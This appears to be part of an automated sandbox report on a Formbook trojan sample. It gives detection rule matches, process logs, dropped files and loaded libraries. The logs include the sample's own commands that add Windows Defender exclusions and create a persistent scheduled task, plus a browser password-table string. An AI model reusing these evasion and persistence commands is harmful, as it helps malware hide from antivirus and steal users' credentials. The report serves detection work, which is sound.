Source: 10.2.8SxJ9aYfJ1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 10.2.8SxJ9aYfJ1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2392518879.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.2641212802.0000000000EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.4528036238.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000017.00000002.4532261432.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.4526845304.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.4523991342.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.4529774873.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2569786862.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4529392421.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2393885514.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: 8SxJ9aYfJ1.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TwkYThKVQVaYn.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	Security API names: _0020.SetAccessControl
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	Security API names: _0020.AddAccessRule
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	Security API names: _0020.SetAccessControl
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	Security API names: _0020.AddAccessRule
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, J9RVJ6K99W0MlJv4fW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, J9RVJ6K99W0MlJv4fW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	Security API names: _0020.SetAccessControl
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	Security API names: _0020.AddAccessRule
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, J9RVJ6K99W0MlJv4fW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@27/16@15/12

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

File created: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6268:120:WilError_03
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Mutant created: \Sessions\1\BaseNamedObjects\ndrqIdm
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_03

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE0B6.tmp

Jump to behavior

Source: 8SxJ9aYfJ1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 8SxJ9aYfJ1.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: findstr.exe, 00000012.00000003.2672506817.0000000003116000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2672696728.0000000003136000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4528334347.0000000003165000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4528334347.0000000003136000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4528334347.0000000003141000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 8SxJ9aYfJ1.exe	ReversingLabs: Detection: 95%
Source: 8SxJ9aYfJ1.exe	Virustotal: Detection: 43%

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

File read: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\8SxJ9aYfJ1.exe "C:\Users\user\Desktop\8SxJ9aYfJ1.exe"
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\8SxJ9aYfJ1.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpE0B6.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Users\user\Desktop\8SxJ9aYfJ1.exe "C:\Users\user\Desktop\8SxJ9aYfJ1.exe"
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Users\user\Desktop\8SxJ9aYfJ1.exe "C:\Users\user\Desktop\8SxJ9aYfJ1.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpF632.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process created: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe "C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe"
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
Source: C:\Windows\SysWOW64\findstr.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\8SxJ9aYfJ1.exe"	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe"	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpE0B6.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Users\user\Desktop\8SxJ9aYfJ1.exe "C:\Users\user\Desktop\8SxJ9aYfJ1.exe"	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Users\user\Desktop\8SxJ9aYfJ1.exe "C:\Users\user\Desktop\8SxJ9aYfJ1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpF632.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process created: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe "C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe"	Jump to behavior
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
